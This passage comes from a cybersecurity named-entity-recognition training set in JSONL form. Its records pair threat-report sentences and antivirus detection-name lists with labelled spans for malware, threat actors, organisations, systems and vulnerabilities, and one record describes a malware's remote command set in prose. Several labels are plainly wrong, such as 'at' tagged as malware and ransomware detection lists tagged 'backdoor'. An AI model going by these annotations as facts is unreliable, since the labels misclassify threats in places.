WORM_SILLY.SMRP 
Trojan.Dropper.UYL Trojan.Win32.Crypted.cqxgku Trojan.Win32.Dropper.abl Trojan.Dropper.UYL Trojan.Dropper.UYL Win32.Sector.30 WORM_SILLY.SMRP BehavesLike.Win32.Sality.th Win32/HLLP.Kuku.poly2 W32/Sality.AT Worm:Win32/Enosch.A Win32.Virus.Sality.A HEUR/Fakon.mwf Virus.Win32.Sality.bakc Trojan.DataStealer.B Win32/Sality.NBA Win32.Sality.BL Trojan.Win32.Enosch W32/DataStealer.B!tr W32/Sality.AA Virus.Win32.Sality.I", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004611", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.BLA.FC.3019 Variant.Kazy.msZ5 Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.MulDrop4.60646 Trojan-PWS.MSIL PWS:MSIL/Mintluks.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004612", "source": "cyner2_train"}} {"text": "This attack is particularly effective since execution of WTP is not accompanied by a security warning and users have been conditioned to run the troubleshooter when it appears in Windows.", "spans": {"VULNERABILITY: WTP": [[57, 60]], "SYSTEM: Windows.": [[179, 187]]}, "info": {"id": "cyner2_train_004613", "source": "cyner2_train"}} {"text": "During ISSP Labs daily threat activity monitoring a new virus distribution campaign with a unique malware sample was discovered.", "spans": {"ORGANIZATION: ISSP Labs": [[7, 16]], "THREAT_ACTOR: new virus distribution campaign": [[52, 83]], "MALWARE: malware": [[98, 105]]}, "info": {"id": "cyner2_train_004614", "source": "cyner2_train"}} {"text": "The attacks likely were initially delivered via spear-phishing e-mails, or as demonstrated by C0d0so0 in the past, legitimate websites that had been previously compromised then used as watering holes for the selected victims.", "spans": {"THREAT_ACTOR: C0d0so0": [[94, 101]]}, "info": {"id": "cyner2_train_004615", "source": "cyner2_train"}} {"text": "A backdoor also known as: W97M.Bendis.AU X97M.Dropper.ID W97M.Bendis.AU W97M.Downloader X2KM_DROPPER.NEZ W97M.Bendis.AU 
Trojan.Ole2.Vbs-heuristic.druvzi W97M.Bendis.AU W97M.Bendis.AU X2KM_DROPPER.NEZ X97M/Dropper.c HEUR.VBA.Trojan.d TrojanDropper:O97M/Credoor.A X97M/Dropper.d W97M.Bendis W97M.Bendis.AU", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004616", "source": "cyner2_train"}} {"text": "Indicators related to a group of attackers that have been targeting Japan for a few years and are responsible for recent breaches against Japanese targets", "spans": {"THREAT_ACTOR: group of attackers": [[24, 42]], "ORGANIZATION: Japanese targets": [[138, 154]]}, "info": {"id": "cyner2_train_004617", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Rovnix.Win64.17 Troj.Win64.Rovnix!c Trojan.Win64.Rovnix.au Trojan.Win64.Mayachok.dsethy Trojan.Mayachok.19009 Trojan/Rovnix.f W32.Rovnix TR/Rovnix.I Trojan/Win64.Rovnix Trojan.Win64.Rovnix.au Trojan/Win64.Rovnix.R175307 Trojan.Rovnix Trj/Rovnix.B Win64.Trojan.Rovnix.Pdmr Trojan.Rovnix!6RUsEoDKtkI Trojan.Win64.Rovnix Win32/Trojan.52f", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004618", "source": "cyner2_train"}} {"text": "These .jar files are most often identified as Adwind.", "spans": {"MALWARE: Adwind.": [[46, 53]]}, "info": {"id": "cyner2_train_004619", "source": "cyner2_train"}} {"text": "A new Android banking trojan called Nexus has been promoted via a Malware-as-Service subscription service, but is still in its early stages, suggests security researcher Cleafy's analysis.", "spans": {"MALWARE: Android banking trojan": [[6, 28]], "MALWARE: Nexus": [[36, 41]], "MALWARE: a Malware-as-Service subscription service,": [[64, 106]], "ORGANIZATION: security researcher Cleafy's analysis.": [[150, 188]]}, "info": {"id": "cyner2_train_004620", "source": "cyner2_train"}} {"text": "A backdoor also known as:", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004622", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Ransom.AIG 
Trojan/W32.Xorist.13312.E Trojan-Ransom.Win32.Xorist!O Trojan.Ransom.FO4 Trojan.Ransom.AIG Win32.Trojan.Filecoder.g Ransom.CryptoTorLocker Ransom_XORIST.SMA Win.Trojan.CryptoTorLocker2015-1 Trojan.Ransom.AIG Trojan-Ransom.Win32.Xorist.lk Trojan.Ransom.AIG Trojan.Win32.Xorist.dxuuhl Trojan.Win32.A.Xorist.1268736 Trojan.Ransom.AIG TrojWare.Win32.Kryptik.ER Trojan.Encoder.94 Ransom_XORIST.SMA Trojan/Xorist.at TR/Ransom.Xorist.EJ Trojan[Ransom]/Win32.Xorist Trojan.Ransom.AIG Troj.Ransom.W32.Xorist.tnPf Trojan-Ransom.Win32.Xorist.lk Ransom:Win32/Sorikrypt.A Trojan/Win32.Xorist.R21676 Hoax.Xorist Ransom.FileCryptor Trj/RansomXor.A Trojan.Win32.CryptoTorLocker2015.a Trojan-Ransom.CryptoTorLocker215 Win32/Trojan.1ee", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004625", "source": "cyner2_train"}} {"text": "I am not sure what these are but am guessing at possibly Emotet banking Trojan", "spans": {"MALWARE: Emotet banking Trojan": [[57, 78]]}, "info": {"id": "cyner2_train_004626", "source": "cyner2_train"}} {"text": "While most of the interest still lies in the public sector, more recent attacks were found targeting the following industries:Aviation Broadcasting Energy Financial Non-governmental organizations NGO Pharmaceutical Public sector Publishing Software", "spans": {"ORGANIZATION: public sector,": [[45, 59]], "ORGANIZATION: industries:Aviation Broadcasting Energy Financial Non-governmental organizations NGO Pharmaceutical Public sector Publishing Software": [[115, 248]]}, "info": {"id": "cyner2_train_004627", "source": "cyner2_train"}} {"text": "ESET contacted Eltima as soon as the situation was confirmed.", "spans": {"ORGANIZATION: ESET": [[0, 4]], "ORGANIZATION: Eltima": [[15, 21]]}, "info": {"id": "cyner2_train_004628", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.MalPack Trojan.Graftor.D69EE1 Win32.Trojan.Kryptik.pd Ransom_LOCKY.SMXA Trojan.Win32.Kryptik.evdsll Ransom_LOCKY.SMXA BehavesLike.Win32.Upatre.qh 
TrojanDownloader:Win32/Brucryp.G Trj/GdSda.A W32/Kryptik.EXPV!tr Win32/Trojan.160", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004630", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Script.473379 Trojan/W32.Clicker.349278 Trojan.Clicker.r5 Trojan.Script.473379 Trojan.Win32.MLW.lvntl W32/MalwareF.CARP Trojan.ADH Trojan.Win32.Clicker.hd Trojan.Win32.S.Clicker.349278[h] Trojan.Script.473379 Trojan.Script.473379 Trojan.DownLoader6.110 BehavesLike.Win32.Dropper.fc W32/Risk.VMFK-0127 Trojan/Clicker.je Trojan.Script.D73923 Trojan:Win32/Gleishug.C Trojan.Script.473379 Trj/CI.A Win32.Trojan.Clicker.Hoye AdWare.FTat Trojan.Script.473379", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004631", "source": "cyner2_train"}} {"text": "In late 2014, ESET presented an attack campaign that had been observed over a period of time targeting Russia and other Russian speaking nations, dubbed Roaming Tiger", "spans": {"ORGANIZATION: ESET": [[14, 18]], "THREAT_ACTOR: attack campaign": [[32, 47]], "ORGANIZATION: Russian speaking nations,": [[120, 145]], "THREAT_ACTOR: Roaming Tiger": [[153, 166]]}, "info": {"id": "cyner2_train_004632", "source": "cyner2_train"}} {"text": "Its different modifications target mobile devices of Russian users from February 2015.", "spans": {"SYSTEM: mobile devices": [[35, 49]], "ORGANIZATION: Russian users": [[53, 66]]}, "info": {"id": "cyner2_train_004633", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.MasendosA.Trojan Worm.Win32.AutoRun!O Trojan.Tofsee.1 Win32.Trojan.WisdomEyes.16070401.9500.9997 Win.Worm.Autorun-6961 P2P-Worm.Win32.Palevo.idwe Trojan.Win32.Graz.vhpfw Worm.Win32.A.AutoRun.90112 TrojWare.Win32.Kryptik.JIU Win32.HLLM.Graz Worm.AutoRun.Win32.31130 BehavesLike.Win32.Downloader.kc Worm.Win32.Wergimog Worm/AutoRun.agqt TR/Offend.5523698 Worm[P2P]/Win32.Palevo Worm:Win32/Wergimog.A P2P-Worm.Win32.Palevo.idwe Worm/Win32.Cynic.R5955 Worm.AutoRun 
Win32/AutoRun.IRCBot.HL Win32.Worm-p2p.Palevo.Swub Worm.AutoRun!FV4PXQUzhXU Win32/Trojan.515", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004634", "source": "cyner2_train"}} {"text": "Over the past few months there has been a lot of research and press coverage on the Shamoon campaigns.", "spans": {"THREAT_ACTOR: the Shamoon campaigns.": [[80, 102]]}, "info": {"id": "cyner2_train_004635", "source": "cyner2_train"}} {"text": "A sophisticated hacking group with suspected ties to cybercrime gangs operating in Eastern Europe is now actively targeting and breaching prominent, brand name restaurants in the U.S.", "spans": {"THREAT_ACTOR: sophisticated hacking group": [[2, 29]], "THREAT_ACTOR: cybercrime gangs operating": [[53, 79]], "ORGANIZATION: restaurants": [[160, 171]]}, "info": {"id": "cyner2_train_004638", "source": "cyner2_train"}} {"text": "A backdoor also known as: Exploit.Win64 Exploit.Win64.Apolmy.ewzxbo Trojan.Win64.Dianti TR/Apolmy.paocz Trojan:Win64/Apolmy.A Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004639", "source": "cyner2_train"}} {"text": "This EPS exploit was assigned CVE-2015-2545.", "spans": {"MALWARE: EPS exploit": [[5, 16]]}, "info": {"id": "cyner2_train_004640", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Sality.mBZF Trojan.Win32.Clicker.bcgwsn Trojan.Click2.33988 Trojan.Win32.Alyak W32/Trojan.WWZX-6000 TR/Graftor.27537.200 Trojan/Win32.Unknown Backdoor:Win32/Kanav.D BScope.Trojan.Win32.Inject.2 Trj/CI.A Trojan.Symmi.DB644 Win32/Trojan.070", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004641", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Clicker.Delf.JK Trojan-Clicker.Win32.Delf!O Trojan.Clicker.Delf.JK Win32.Trojan-Downloader.Delf.bq Win32/Bancos.QQM TROJ_CLICKER.ATG Win.Trojan.Delf-2308 Trojan-Clicker.Win32.Delf.ih Trojan.Clicker.Delf.JK Trojan.Win32.Delf.dxqhln Win32.Trojan.Delf.Eamx 
Trojan.Clicker.Delf.JK Trojan.Clicker.Delf.JK Trojan.Badjoke TROJ_CLICKER.ATG TrojanClicker.Delf.fq TR/Clicker.Delf.IH Trojan[Clicker]/Win32.Delf Trojan.Win32.Clicker.475648 Trojan-Clicker.Win32.Delf.ih Trojan.Clicker.Delf.JK Trojan/Win32.AdClicker.R5452 Trojan.Clicker.Delf.JK TrojanClicker.Delf Win32/TrojanDownloader.Delf.OVE Trojan.CL.Delf.BJTO Trojan-Dropper.Delf W32/Delf.YS!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004643", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Dropper.Win32.MultiJoiner!O Troj.Dropper.W32.Pincher.lfij Trojan.Heur.GM.11400100A0 Win32.Trojan.WisdomEyes.16070401.9500.9992 Win32/MicroJoiner.A TROJ_MULTIJOIN.A Trojan-Dropper.Win32.Microjoin.ap TrojWare.Win32.Spy.Zbot.AAT Trojan.MulDrop.613 BehavesLike.Win32.Trojan.vc Trojan-PWS.Win32.LdPinch TrojanDropper.MultiJoiner.13.b Win32.Troj.GaoPSGet.49893 TrojanDropper:Win32/MultiJoiner.A Trojan-Dropper.Win32.Microjoin.ap Dropper/Win32.Microjoin.C70525 Trj/Multijoiner.A Win32/TrojanDropper.MultiJoiner.13.B Trojan.DR.MultiJoiner.D", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004646", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Downloader.Win32.Small!O Downloader.Small.16212 Win32.Trojan.WisdomEyes.16070401.9500.9891 Win32/Kotan.20.A Trojan-Downloader.Win32.Small.fbn Trojan.Win32.Kotan.hadu Troj.Downloader.W32.Small.fbn!c Win32.Trojan-Downloader.Small.cmak TrojWare.Win32.TrojanDownloader.Kotan Trojan.Kaotan Downloader.Small.Win32.3682 TrojanDownloader.Kotan.b W32.Malware.Downloader Win32.Troj.Kotan.kcloud TrojanDownloader:Win32/Kotan.A Trojan-Downloader.Win32.Small.fbn Trojan/Win32.HDC.C69071 TrojanDownloader.Small Win32/TrojanDownloader.Kotan Trojan.DL.Small!ILxLTxTzCnE Trojan-Downloader.Win32.Kotan", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004647", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.OnGamesLT180912HKGHAAI.Trojan 
Trojan-GameThief.Win32.OnLineGames!O Trojan/Dropper.Killav.lt Win32.Trojan.WisdomEyes.16070401.9500.9999 W32.Fiala.A Win.Trojan.Geral-941 Trojan-Dropper.Win32.Killav.lt Trojan.Win32.Killav.dqiwur Troj.Dropper.W32.Killav.lt!c Win32.Trojan-dropper.Killav.Sunr Backdoor.Win32.Popwin.~IT Trojan.KillProc.13934 Dropper.Killav.Win32.187 BehavesLike.Win32.PWSOnlineGames.mc Trojan-Downloader.Win32.Geral Trojan/PSW.Magania.amzf Trojan[Downloader]/Win32.Geral TrojanDownloader:Win32/Dogkild.S Trojan/Win32.OnlineGameHack.R38048 BScope.Trojan.SvcHorse.01643 Trj/Pupack.A Win32/AutoRun.KillAV.I Trojan.DR.Killav!1BWU2jDjRDE", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004648", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.FakeW7Folder.Fam.Trojan Trojan.Mauvaise.SL1 Trojan.Badur.Win32.8423 Trojan.Win32.Badur.dgkukl Win32.Trojan.Fakedoc.Auto TrojWare.Win32.Imwee.A BackDoor.Bulknet.1486 TR/Dldr.Imwee Trojan/Win32.Badur Trojan.Zusy.D39D62 Backdoor/Win32.Trojan.C753557 Win32/Trojan.IM.66a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004649", "source": "cyner2_train"}} {"text": "A backdoor also known as: JS/Iframe.DGS Script.Trojan-Downloader.IFrame.AE Trojan-Downloader.JS.Iframe.deg Trojan.Script.Expack.bvtkmp PDF.DownLoader.3 BehavesLike.PDF.BadFile.db JS/BlacoleRef.CZ.29 Trojan[Downloader]/JS.Iframe.deg Trojan-Downloader.JS.Iframe.deg JS/Moat.241E54F!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004650", "source": "cyner2_train"}} {"text": "Fileless threats and ransomware aren't new, but a malware that incorporates a combination of their characteristics can be dangerous.", "spans": {"MALWARE: Fileless threats": [[0, 16]], "MALWARE: ransomware": [[21, 31]], "MALWARE: malware": [[50, 57]]}, "info": {"id": "cyner2_train_004651", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.Skillis.a W32/Trojan.PYDC-5827 W32.SillyFDC Win32/Oflwr.A!crypt 
Win32.Application.PUPStudio.A Trojan.Win32.Skillis.cqimdi Trojan.DownLoader21.39298 Trojan.Skillis.Win32.2785 TR/Drop.KillAV.A.69 Trojan/Win32.Unknown TrojanDropper:Win32/Killav.A Trojan/Win32.Backdoor.R142720 Trojan.Skillis Trojan.Win32.Skillis.aaa Trojan.PWS.Banbra!0kkWPO51+fM Win32.Outbreak W32/QQPass.ELG!tr.pws Win32/Trojan.7d3", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004652", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Kazy.DAD1ED Win32.Trojan.WisdomEyes.16070401.9500.9998 W32/Trojan.ESEG-0989 Trojan.MSIL.Crypt.fpoa Trojan.Win32.Crypt.evvrmx BackDoor.Tordev.976 BehavesLike.Win32.Trojan.fc TR/Dropper.MSIL.lfcge Trojan:Win32/Rebhip.AA!bit Trojan.MSIL.Crypt.fpoa Trj/GdSda.A Msil.Trojan.Crypt.Hfp Trojan.MSIL.Injector MSIL/Injector.LHM!tr Win32/Trojan.658", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004653", "source": "cyner2_train"}} {"text": "A backdoor also known as: Infostealer.Jackpos BKDR_JACKPOS.SM BKDR_JACKPOS.SM BehavesLike.Win32.Dropper.ch Trojan.Win32.Jinupd W32/Trojan.RTKE-0140 Trojan:Win32/Jinupd.B Trojan/Win32.HDC.C743594 Trj/JackPos.A Win32/Trojan.2d8", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004654", "source": "cyner2_train"}} {"text": "First observed in July 2014, Dridex, a financial banking Trojan, is considered the successor to the GameOver ZeuS GoZ malware.", "spans": {"MALWARE: Dridex,": [[29, 36]], "MALWARE: financial banking Trojan,": [[39, 64]], "MALWARE: GameOver ZeuS GoZ malware.": [[100, 126]]}, "info": {"id": "cyner2_train_004655", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Sdbot Backdoor/SdBot.zj Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Sdbot.MAM W32.Spybot.Worm Win32/Dopbot.B WORM_SDBOT.CGE Win.Trojan.SdBot-3536 Backdoor.Win32.SdBot.zj Trojan.Win32.SdBot.esce Backdoor.Win32.SdBot.28160.B Backdoor.W32.SdBot.zj!c BackDoor.IRC.Veritas Backdoor.SdBot.Win32.2281 WORM_SDBOT.CGE 
BehavesLike.Win32.Backdoor.mc Packed.Morphine.a WORM/IrcBot.28160.1 Trojan[Backdoor]/Win32.SdBot Backdoor.Win32.SdBot.zj BScope.Trojan-PSW.Gomex.8 W32/Gaobot.FCZ.worm IRC/SdBot.DWM Win32.Backdoor.Sdbot.Pavs Worm.SdBot!xpvJkAbKgi0", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004656", "source": "cyner2_train"}} {"text": "A backdoor also known as: HackTool.MultiUnwrapper Win32.Trojan.WisdomEyes.16070401.9500.9852 Infostealer.Gampass Win.Trojan.736804-1 HackTool.Win32.MultiUnwrapper Trojan[Dropper]/Win32.Dapato Trj/CI.A Riskware.HackTool!LCoXxVEhnjI Win32/Trojan.03f", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004657", "source": "cyner2_train"}} {"text": "APT-C-36, also known as Blind Eagle, has been actively targeting organizations in Colombia and Ecuador since at least 2019.", "spans": {"THREAT_ACTOR: APT-C-36,": [[0, 9]], "THREAT_ACTOR: Blind Eagle,": [[24, 36]], "ORGANIZATION: organizations": [[65, 78]]}, "info": {"id": "cyner2_train_004658", "source": "cyner2_train"}} {"text": "A backdoor also known as: Adware.Rugo Trojan.Win32.BHO.fie AdWare.Win32.BHO.cdg Trojan.MulDrop.15726 TR/BHO.fie TrojanDropper:Win32/Jhee.V Trojan.Win32.BHO.fie Adware.WSearch.O Trojan.Win32.Jhee.V Trojan.BHO.fie", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004660", "source": "cyner2_train"}} {"text": "A backdoor also known as: TrojanDownloader.Cabby Trojan/Filecoder.MaktubLocker.c Win32.Trojan.WisdomEyes.16070401.9500.9999 RANSOM_CRYPMAKTUBLOCKER_GC3101B5.UVPM Trojan.Win32.Banpak.bbb Trojan.Win32.Cabby.emrzuq W32.Virut.lyDR Trojan.DownLoader24.13143 Downloader.Cabby.Win32.1871 RANSOM_CRYPMAKTUBLOCKER_GC3101B5.UVPM TrojanDownloader.Cabby.cpa TR/Crypt.Xpack.wgudg Trojan[Downloader]/Win32.Cabby Trojan.Razy.D255EB Trojan.Win32.Ransom.59904.R Trojan.Win32.Banpak.bbb Trojan/Win32.Locky.R197360 TrojanDownloader.Cabby Win32/Filecoder.MaktubLocker.C Trojan.Filecoder!sTyUXy4/Qig", "spans": {"MALWARE: backdoor": 
[[2, 10]]}, "info": {"id": "cyner2_train_004661", "source": "cyner2_train"}} {"text": "The Sofacy group, also known as APT28, Pawn Storm, Fancy Bear, and Sednit, continues to add to the variety of tools they use in attacks; in this case, targeting individuals in the aerospace industry running the OS X operating system.", "spans": {"THREAT_ACTOR: Sofacy group,": [[4, 17]], "THREAT_ACTOR: APT28, Pawn Storm, Fancy Bear,": [[32, 62]], "THREAT_ACTOR: Sednit,": [[67, 74]], "MALWARE: tools": [[110, 115]], "ORGANIZATION: individuals": [[161, 172]], "ORGANIZATION: aerospace industry": [[180, 198]], "SYSTEM: OS X operating system.": [[211, 233]]}, "info": {"id": "cyner2_train_004665", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor/W32.Androm.266082.B Trojandownloader.Macdowpay Trojan.Win32.Godzilla.ephbuw Trojan.Encoder.11909 Backdoor.Androm.Win32.43313 BehavesLike.Win32.Backdoor.dc Trojan.Yakes.vjn Trojan.Backdoor.Quakbot TR/Fuery.shpvm TrojanDownloader:Win32/Macdowpay.A Trojan.Razy.D2B7A8 Trojan/Win32.Locky.R201696 Backdoor.Androm Backdoor.Andromeda Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004666", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Horst Win32.Trojan.WisdomEyes.16070401.9500.9997 W32/Downloader.OMUB-6519 Trojan-Proxy.Win32.Horst.av Trojan.Win32.Horst.dqlqvp Trojan.DownLoader.9121 W32/Downloader.YSQ Trojan[Proxy]/Win32.Horst Trojan-Proxy.Win32.Horst.av TrojanProxy.Horst", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004667", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan-PSW.OLGames.bp W32.Rontokbro@mm Trojan.Win32.Krap.dazptt Trojan.Win32.Z.Onlinegames.25088.A Trojan.Click3.21708 BehavesLike.Win32.PWSOnlineGames.mc W32/Trojan.UITW-4840 Trojan/PSW.OnLineGames2.dg PWS:Win32/Zakahic.A Win32.Trojan.Dropper.Heur Trojan.Win32.OnlineGames.daq Trojan-GameThief.Win32.OnLineGames W32/Onlinegames.PYY!tr", "spans": {"MALWARE: 
backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004668", "source": "cyner2_train"}} {"text": "This new threat actor we are naming YoroTrooper has been targeting governments across Eastern Europe since at least June 2022, and Cisco Talos has found three different activity clusters with overlapping infrastructure that are all linked to the same threat actor.", "spans": {"THREAT_ACTOR: threat actor": [[9, 21]], "THREAT_ACTOR: YoroTrooper": [[36, 47]], "ORGANIZATION: governments": [[67, 78]], "MALWARE: at": [[107, 109]], "ORGANIZATION: Cisco Talos": [[131, 142]], "SYSTEM: infrastructure": [[204, 218]], "THREAT_ACTOR: the same threat actor.": [[242, 264]]}, "info": {"id": "cyner2_train_004671", "source": "cyner2_train"}} {"text": "The code contains multiple comments in Italian , here is the most noteworthy example : “ Receive commands from the remote server , here you can set the key commands to command the virus ” Here are the available commands : Name Description cd Change current directory to specified quit Close the socket nggexe Execute received command via Python ’ s subprocess.Popen ( ) without outputs ngguploads Upload specified file to the specified URL nggdownloads Download content from the specified URLs and save to specified file nggfilesystem Dump file structure of the C : path , save it to the file in json format and zip it nggstart_screen nggstop_screen Enable/disable screenshot module .", "spans": {"SYSTEM: Python": [[338, 344]]}, "info": {"id": "cyner2_train_004672", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32/SillyPWS.CT Trojan-Spy.MSIL!IK Trojan.MulDrop1.16499 TrojanSpy.MSIL.acx PWS:MSIL/VB.B Trojan-Spy.MSIL", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004673", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9994 Trojan.Win32.Waldek.aqji Trojan.Win32.Dwn.dzdxxu BackDoor.PlugX.7 Dropper.Dapato.Win32.27346 BehavesLike.Win32.MultiPlug.fh 
TrojanDropper.Dapato.snz TR/AD.Plugx.M.6 Trojan[Dropper]/Win32.Dapato Trojan.Win32.Waldek.aqji Backdoor:Win32/Plugx.L!dha Trj/GdSda.A Win32.Trojan.Waldek.Wrgj Trojan.Win32.Crypt W32/Kryptik.DGGW!tr TrojanDropper.Dapato Win32/Trojan.bdb", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004674", "source": "cyner2_train"}} {"text": "Unfortunately, malware authors often utilize these same capabilities to compromise systems.", "spans": {"THREAT_ACTOR: malware authors": [[15, 30]], "SYSTEM: compromise systems.": [[72, 91]]}, "info": {"id": "cyner2_train_004675", "source": "cyner2_train"}} {"text": "This notable characteristic made this attack worthy of further analysis.", "spans": {}, "info": {"id": "cyner2_train_004677", "source": "cyner2_train"}} {"text": "First, this domain pattern looks just like the extremely prevalent, yet benign Akamai CDN domain.", "spans": {"ORGANIZATION: Akamai": [[79, 85]], "SYSTEM: CDN": [[86, 89]]}, "info": {"id": "cyner2_train_004681", "source": "cyner2_train"}} {"text": "A backdoor also known as: WORM_DORKBOT.SMA Win32.Trojan.WisdomEyes.16070401.9500.9989 Trojan.FakeAV WORM_DORKBOT.SMA Packed.Win32.Katusha.o Trojan.Win32.Katusha.exnjhu BehavesLike.Win32.PWSZbot.qc Packed.Katusha.agmk Trojan.Downloader.126 Packed.Win32.Katusha.o Win32.Worm.Autorun.E Trojan/Win32.Cosmu.C71744 W32/Crypt.AAAI!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004683", "source": "cyner2_train"}} {"text": "A backdoor also known as: Udsdangerousobject.Multi Trojan.Waldek.Win32.5328 Uds.Dangerousobject.Multi!c BKDR_REMCOS.DRQW Trojan.Win32.Waldek.akql Trojan.Win32.Waldek.etvwxi Trojan.Win32.Z.Highconfidence.731416 BKDR_REMCOS.DRQW Trojan.Win32.Waldek W32/Trojan.CSQN-6734 W32.Waldek.Akql TR/Waldek.rludr Trojan/Win32.Waldek Trojan:Win32/Vonocksu.A Trojan.Win32.Waldek.akql Trojan/Win32.Waldek.C2216962 Trj/GdSda.A Win32.Trojan.Waldek.Htvv W32/REMCOS.DRQW!tr.bdr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": 
{"id": "cyner2_train_004684", "source": "cyner2_train"}} {"text": "Unlike other ATM malware families, Alice cannot be controlled via the numeric pad of ATMs; neither does it have information stealing features.", "spans": {"MALWARE: ATM malware families, Alice": [[13, 40]], "MALWARE: ATMs;": [[85, 90]]}, "info": {"id": "cyner2_train_004685", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.Malware.1 W32.Mailbancos@mm Win32.Mailbancos@mm W32.Mailbancos@mm SHeur2.XWF Trj/Banbra.GGU", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004687", "source": "cyner2_train"}} {"text": "A backdoor also known as: HW32.Packed.A13D Backdoor.Sinowal.BC Backdoor/W32.Sinowal.335872.B Backdoor.Sinowal.Win32.471 Backdoor.Sinowal.BC Win32.Trojan.WisdomEyes.16070401.9500.9996 Trojan.Mebroot Win.Trojan.Sinowal-1209 Backdoor.Sinowal.BC Backdoor.Win32.Sinowal.eee Backdoor.Sinowal.BC Trojan.Win32.Sinowal.bfkka Backdoor.Win32.Sinowal.335872 Backdoor.W32.Sinowal!c Backdoor.Sinowal.BC Backdoor.Win32.Sinowal.~CRSB Trojan.Packed.2355 BehavesLike.Win32.Sality.fc Backdoor.Win32.Sinowal W32/Backdoor2.EHUE Backdoor/Sinowal.gje RKIT/MBR.Sinowal.W Trojan[Backdoor]/Win32.Sinowal Win32.Hack.SinowalT.bg.339968 Backdoor.Win32.Sinowal.eee Backdoor.Sinowal.BC Backdoor.Sinowal Win32.Backdoor.Sinowal.Liqd W32/SINOWAL.A!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004688", "source": "cyner2_train"}} {"text": "What makes this interesting is how the dated botnet and macro malware trick are used together.", "spans": {"MALWARE: botnet": [[45, 51]], "MALWARE: macro malware": [[56, 69]]}, "info": {"id": "cyner2_train_004690", "source": "cyner2_train"}} {"text": "This weekend saw multiple reports a new zero-day vulnerability that affected all versions of Microsoft Word.", "spans": {"VULNERABILITY: zero-day vulnerability": [[40, 62]], "SYSTEM: Microsoft Word.": [[93, 108]]}, "info": {"id": "cyner2_train_004691", "source": "cyner2_train"}} 
{"text": "A 17-year-old vulnerability in Microsoft Office Equation Editor is now confirmed to be exploited by the Cobalt Group.", "spans": {"VULNERABILITY: A 17-year-old vulnerability": [[0, 27]], "SYSTEM: Microsoft Office Equation Editor": [[31, 63]], "VULNERABILITY: exploited": [[87, 96]], "THREAT_ACTOR: the Cobalt Group.": [[100, 117]]}, "info": {"id": "cyner2_train_004692", "source": "cyner2_train"}} {"text": "In recent months, Kaspersky observed an increase in the number of malicious campaigns that use Google Advertising as a means of distributing and delivering malware.", "spans": {"ORGANIZATION: Kaspersky": [[18, 27]], "THREAT_ACTOR: malicious campaigns": [[66, 85]], "ORGANIZATION: Google Advertising": [[95, 113]], "MALWARE: malware.": [[156, 164]]}, "info": {"id": "cyner2_train_004693", "source": "cyner2_train"}} {"text": "A backdoor also known as: 